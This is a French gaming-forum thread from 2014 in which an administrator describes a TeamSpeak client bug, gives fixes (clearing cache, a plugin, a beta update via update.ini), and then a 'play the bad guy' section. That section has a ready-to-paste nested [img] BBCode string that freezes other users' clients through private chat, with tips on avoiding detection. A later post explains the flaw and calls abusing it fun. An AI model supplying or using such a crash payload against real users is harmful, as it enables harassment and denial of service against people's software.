TUTO Teamspeak exploit

Discussion dans 'Tutos' créé par dragonhib, 19 Juin 2014.

1. dragonhib

Administrateur Survivant Crafteur

Inscrit:
    22 Mai 2011
    J'aime reçus:
    265
    Yop les gens,

Hier soir, un gars est passé sur le TS et a fait bugguer tous les gens. Il a fait ça en utilisant un exploit connu par les devs, qui est fixé dans la prochaine version. Voici quelques parades et astuces :

Si vous avez été touché par le méchant, une solution simple :
    Allez dans Settings -> Options -> onglet Security -> Clear cache et videz vos chats

Si vous voulez vous protéger des méchants :
    Vous pouvez utiliser ce plugin, qui vous protégera

Si vous voulez passer sur la beta de la version 3.0.15 (et donc vous passer des 2 précédentes solutions)
    Allez dans votre dossier d'install Teamspeak (C:\programs files\Teamspeak), ouvrez le fichier update.ini (créer le s'il n'existe pas) et rajoutez :
    Code:
    [channel]
    beta=true
    Il s'agit d'une version beta, qui peut donc contenir des bugs ou autres exploits. Je vous conseillerais donc de repasser en version stable dès que la 3.0.15 sera sortie.

Si vous voulez jouer au méchant :
    Vous devez être en version 3.0.15 pour ne pas freezer aussi !!!

ensuite, pour faire freezer un gus, il suffit de double-cliquer sur son pseudo pour lancer le chat privé et copier collé cette ligne :

Code:
    [img][img]//):/([/img][/img][img][img]//)./S[/img][/img][img][img]//"y/:[/img][/img][img][img]//6K/^[/img][/img][img][img]//Qs/A[/img][/img][img][img]//k9/>[/img][/img][img][img]//VY/@[/img][/img][img][img]//"{/)[/img][/img][img][img]//S$/X[/img][/img][img][img]//nt/>[/img][/img][img][img]//ix/o[/img][/img][img][img]//+S/b[/img][/img][img][img]//+>/*[/img][/img][img][img]//b+/p[/img][/img][img][img]//EK/8[/img][/img][img][img]//hh/_[/img][/img][img][img]//F4/H[/img][/img][img][img]//Gv/>[/img][/img][img][img]//{{/M[/img][/img][img][img]//Gt/R[/img][/img][img][img]//c-//[/img][/img][img][img]//.v/'[/img][/img][img][img]//Z7/([/img][/img][img][img]//FU/\[/img][/img][img][img]//`^/+[/img][/img][img][img]//iR/$[/img][/img][img][img]//H1/?[/img][/img][img][img]//O]/T[/img][/img][img][img]//I>/8[/img][/img][img][img]//u@/'[/img][/img]
    Vérifiez qu'il n'est pas déjà en version 3.0.15, car sinon vous vous ferez démasquer !!!

@bientôt pour de nouvelles aventures

• J'aime J'aime x 1
    #1 dragonhib, 19 Juin 2014, à 00:23
    Dernière édition: 19 Juin 2014
  2. dragonhib

Inscrit:
    22 Mai 2011
    J'aime reçus:
    265
    Pour les explications : la version actuelle ne sait pas gérer l'imbrication d'image en base 64 bbcode. Donc le client freeze. Mais le mieux, c'est que le client recharge les chats à la connexion au serveur, et donc refreeze !!!! j'adore, c'est une belle trouvaille et c'est super fun

• Informatif Informatif x 1
  3. raven

Modérateur Donateur Survivant Crafteur

Inscrit:
    23 Mai 2011
    J'aime reçus:
    58
    Hey bah dis donc ils s'en passe des trucs quand je suis pas la ! Sacre bug quand même !!

Sent from my iPhone using Tapatalk

4. dragonhib

Inscrit:
    22 Mai 2011
    J'aime reçus:
    265
    à fond les ptits ballons qui vont sur l'eau

Partager cette page